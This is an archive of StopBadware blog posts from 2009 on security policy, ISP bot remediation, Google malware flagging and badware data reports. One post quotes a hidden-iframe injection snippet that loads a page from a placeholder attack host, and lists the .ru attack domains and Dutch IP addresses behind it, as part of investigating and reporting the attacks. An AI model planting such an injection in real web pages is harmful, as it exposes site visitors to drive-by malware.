StopBadware Blog :

When bad policy attacks

Wed, 18 Nov 2009 14:50:00 -0500

Brian Krebs at the Washington Post reports on some ill-advised proposed legislation:

The chairman of the House Oversight and Government Reform Committee introduced legislation on Tuesday to prohibit the use of peer-to-peer (P2P) file-sharing software across all federal government computers and networks.

This is what happens when policymakers fail to separate problems from the technology that the problems are built upon. It’s roughly equivalent to observing that sports cars are involved in a lot of accidents and therefore banning sports cars from public roadways. Whenever possible, legislation should avoid even mentioning specific technologies, and instead should focus on the underlying problem (in this case, the inadvertent leaking of information by government employees/computers).

Larry Clinton: Government must change market incentives

Wed, 18 Nov 2009 12:42:00 -0500

According to Wired’s Threat Level blog, the president of the Internet Security Alliance, Larry Clinton, blames many cyber security problems on individuals and businesses failing to take responsibility for the role they could/should play:

Larry Clinton, president of the Internet Security Alliance, told senators that public apathy and ignorance played as much a role in the current state of cyber security as the unwillingness of corporate entities to take responsibility for securing the public’s data.

“Many consumers have a false sense of security due to their belief that most of the financial impact resulting from the loss of personal data will be fully covered by corporate entities like the banks,” he said. “In fact, much of these losses are transferred back to consumers in the form of higher interest rates and consumer fees.”

As for corporate and government entities that collect and store the public data, they “do not understand themselves to be responsible for the defense of the data,” said Clinton, whose group represents banks, telecoms, defense and technology companies and other industries that rely on the internet. “The marketing department has data, the finance department has data, etc, but they think the security of the data is the responsibility of the IT guys at the end of the hall.”

Clinton goes on to say that the solution lies in government creating market incentives, and he promises a proposal from the Internet Security Alliance soon. It will be very interesting to see what they propose. As StopBadware board member Michael Barrett (CISO at PayPal) has pointed out, government involvement may be a necessary part of changing incentives and behaviors in an area where externalities are inevitable. At the same time, there are other ways to modify market incentives, as StopBadware and its partners have demonstrated over the last few years. The challenge for all of us working in this space is finding the right balance of public and private interventions.

Clinton himself points out one of the risks of trying to impose new market incentives in his explanation of why consumers don’t take credit card security seriously. As soon as government put the burden of liability on the credit card issuers, consumers no longer had the incentive to protect their card numbers. (Note: one problem with this example is it’s not clear what consumers would be likely to do differently if they were on the hook for unauthorized credit card charges.)

Another concern about imposing new incentives is reflected in StopBadware co-founder Jonathan Zittrain’s work: what happens to freedom (and, by extension, innovation) as the market increasingly values security?

There are no easy solutions here, but it’s clear that market incentives do, in fact, need to be changed, and that some combination of governmental and non-governmental will be required to make that happen. StopBadware and its partners have demonstrated some examples of the latter, showing that malware warnings, alerts about badware applications, and lists of infected hosting providers can encourage improved website security and better applciation behavior without limiting freedom. I look forward to seeing and weighing in on how ISA’s proposal complements what is being done, and can still be done, within the market.

ISPs and the fight against bots

Tue, 10 Nov 2009 14:00:00 -0500

For the last several months, some of the folks at Comcast have been working on a draft IETF document to inform ISPs about the role they can play in remediating bots on their customers’ computers. This is a tricky challenge: on one hand, ISPs are in a great position to detect bot activity, notify their customers, and potentially even block traffic. On the other hand, customers and net neutrality advocates don’t want ISPs mucking around with customers’ Internet use.

The document attempts to find a balance, encouraging ISPs to notify customers of bots and assist with remediation, while warning about some of the risks of more aggressive involvement (such as "walled gardens," in which users are cut off from most Internet access until they clean up an infection).

I wrote up a set of comments which I shared with the authors and now make available here.

Comcast isn’t just talking about this issue in theory. They recently launched a pilot program in Denver that inserts a warning message into web pages that a customer is trying to view if Comcast has detected bot activity on that customer’s account. It will be interesting to watch how this develops over time. How will customers react to the warnings? Will Comcast customers be tricked by fake warnings designed to look like the real ones? How will customers who learn that their computers are bot-infected go about getting them cleaned up? (Comcast offers some useful tools and information for this, as well as support forums. Will this be enough?)

There’s no question that ISPs have an important role to play in reducing badware on the Internet, and I commend Comcast for taking intiiative in this area. It will be interesting to see whether this proves effective and whether the potential side effects are able to be kept to a minimum.

Prominent Chinese site flagged for badware

Tue, 27 Oct 2009 16:45:00 -0400

It was reported today that a website of the official newspaper of the Chinese government, The People’s Daily, was flagged for malware by Google. The paper apparently complained that Google was maliciously flagging the site due to the paper’s criticism of Google Library. Google China denied the allegation, pointing out that the site was flagged by automated anti-malware systems, not based on content. As reported, the Google statement makes a small mistake in indicating that StopBadware.org provided the software for this automated system. In fact, Google’s Safe Browsing team developed the system themselves. For more information, see the relevant section of our FAQ.

The important lesson of this incident is that legitimate websites, whether operated by individuals or by large government-sponsored organizations, can fall victim to badware. Indeed, in China, where infection rates have historically been high, we hope this will serve as a wake-up call to website owners, hosting companies, and other parties about the need to secure their sites and platforms.

More on .NL attacks

Fri, 23 Oct 2009 16:43:00 -0400

Last week I wrote about a new string of attacks we noticed pointing to servers in the Netherlands. Over the weekend I found some public sources which show a more complete list of the attack sites which share the list of IP addresses. Hosts-file.net has a decent compilation of each of the five addresses we listed:

16265 | 85.17.138.27 | 85.17.0.0/16 | LEASEWEB LEASEWEB AS
16265 | 85.17.237.5 | 85.17.0.0/16 | LEASEWEB LEASEWEB AS
15703 | 87.233.139.100 | 87.233.128.0/18 | TRUESERVER
15435 | 217.23.4.76 | 217.23.0.0/20 | KABELFOON
15435 | 217.23.5.27 | 217.23.0.0/20 | KABELFOON

Interestingly the domains don’t overlap in every instance so not every one of the domains listed are necessarily serving out badware. Google, our data partner, says that over 12,000 websites have been infected which point back to one of the sites on these 5 IP addresses. I’m still working on obtaining a full list of all the infected sites to analyze the distribution of the victims. My assumption is that certain web hosts were harder hit than others but this is entirely speculation until I can analyze the full list.

If you have any information regarding these attacks please feel free to write us at contact <at> stopbadware <dot> org

A light diversion

Fri, 23 Oct 2009 09:44:00 -0400

Security firm Comodo offers this self-promoting but rather humorous spoof of the cable TV show Intervention. In this case, the addict is a laptop that is addicted to malware. (Also available here.)

New StopBadware data reports

Fri, 23 Oct 2009 11:25:00 -0400

We are pleased to unveil two new data reports, based on the data provided by Google and Sunbelt Software to our Badware Website Clearinghouse and information that we’ve pulled from Team Cymru’s public IP to ASN mapping service. One report lists the 50 Autonomous Systems (AS) hosting the greatest number of reported badware URLs. Set up like a stock ticker chart, it also displays the percent daily change in the number of URLs reported on each AS and the 52-week highs and lows for each AS. (Though the data starts in July, 2009, so it’s not yet reflecting 52 weeks.) See the Top 50 report here. There is also a link to it from the left-side navigation bar on the StopBadware.org home page.

The second report, available for any individual AS in our Clearinghouse, shows a graph of the number of reported badware URLs hosted by the AS over time. See an example here, search for an AS by number here, or click more info next to any AS in the Top 50 report for detail on that AS.

Both reports are updated daily and offer the ability to download the data in CSV format. We also wrote up a brief explanation of how to interpret the data in the reports.

We hope that both reports will be valuable to researchers, network operators, and others interested in observing web-based malware trends. Please let us know what you think by sending us a note at contact @ stopbadware dot org.

Google offers webmasters more malware details

Thu, 22 Oct 2009 10:15:00 -0400

Google’s Webmaster Tools has, for quite some time, provided verified website owners with a partial list of pages from their site in which Google found badware during their scanning. Unfortunately, it was often frustrating to site owners to know that Google detected something on a page without knowing what the problem actually was. This frustration should be largely eliminated now that Webmaster Tools has added an experimental Labs feature called "Malware Details," which at least in some cases provides more information to the site owner, as shown in this screenshot from the blog post announcing the feature:

This is a big step forward and should make life much easier for the website owners whose sites have fallen victim to malware. Now, if we can just get Google to share this data with us, so we can better help users who have submitted review requests…

[Update: I just saw that the same blog post mentions another feature, Fetch as Googlebot, which will display a particular page as seen by Google’s web crawler. This also, as noted in the post, can be helpful in diagnosing malware, as it allows the site owner to see how Google’s view of the page differs from the user’s own view. One cause of such a difference is malware that responds differently to different agent or referrer strings in the http request.]

Obama administration supports cyber security month

Mon, 19 Oct 2009 15:57:00 -0400

President Obama recorded the following video (also available here) promoting National Cyber Security Awareness Month and reminding all Americans of our shared responsibility to keep the ‘net safe.

In addition, Janet Napolitano, Secretary of Homeland Security, will be delivering a live webcast tomorrow (Tuesday, Oct. 20, 11 a.m. EDT) on the issue of cyber security and the role that the Department of Homeland Security is playing in this field. The webcast will be available from DHS.gov

Interesting attacks from .NL addresses

Fri, 16 Oct 2009 15:55:00 -0400

I’m researching some new attacks that have been popping up on the BadwareBusters forum recently.

Attacks have the form:

<div style="display:none">mhukhzwbanqawsrlyqptqnfmpiiigkr<iframe width=548 height=403 src="http:ATTACK.SITE:8080/index.php"></iframe></div>

After reviewing the posts by our users I compiled the following list of attack sites:

* bio-vozrast.ru
* your-bio.ru
* biovoz.ru
* age-info.ru
* bio-z.ru
* theprevious.ru
* age-ega.ru

all domains point to a pool of 5 NL based IP addresses:

IP Addresses of Attack Sites
AS	IP	CIDR	AS Name
16265	85.17.138.27	85.17.0.0/16	LEASEWEB
16265	85.17.237.5	85.17.0.0/16	LEASEWEB
15703	87.233.139.100	87.233.128.0/18	TRUESERVER
15435	217.23.4.76	217.23.0.0/20	KABELFOON
15435	217.23.5.27	217.23.0.0/20	KABELFOON

A cursory portscan shows a wide range of services open for each IP address. 85.17.138.27 has two ports which claim to be webmin interfaces for karaokeplus.info. It is unclear if karaokeplus.info is related to these attack sites.

Of the three AS blocks listed (each corresponding to some sort of internet service) only one has an easy to find abuse address:

abuse@leaseweb.com

I’ve sent an email to Leaseweb and will continue to hunt for contacts at the other two organizations.